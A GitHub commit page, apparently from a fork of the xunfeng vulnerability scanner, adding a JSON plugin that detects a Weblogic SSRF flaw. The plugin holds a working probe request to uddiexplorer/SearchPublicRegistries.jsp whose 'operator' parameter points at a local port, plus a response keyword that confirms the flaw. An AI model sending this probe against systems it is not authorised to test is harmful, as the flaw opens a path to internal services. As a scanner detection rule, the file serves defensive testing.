forked from ysrc/xunfeng
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
18 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
{ | ||
"name": "Weblogic SSRF", | ||
"info": "Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。", | ||
"level": "高危", | ||
"type": "SSRF", | ||
"author": "wolf", | ||
"url": "https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf", | ||
"keyword": "tag:weblogic", | ||
"source": 1, | ||
"plugin": { | ||
"url": "/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:46666", | ||
"tag": "存在SSRF漏洞", | ||
"analyzing": "keyword", | ||
"analyzingdata": "could not connect over HTTP to server", | ||
"data": "", | ||
"method": "GET" | ||
} | ||
} |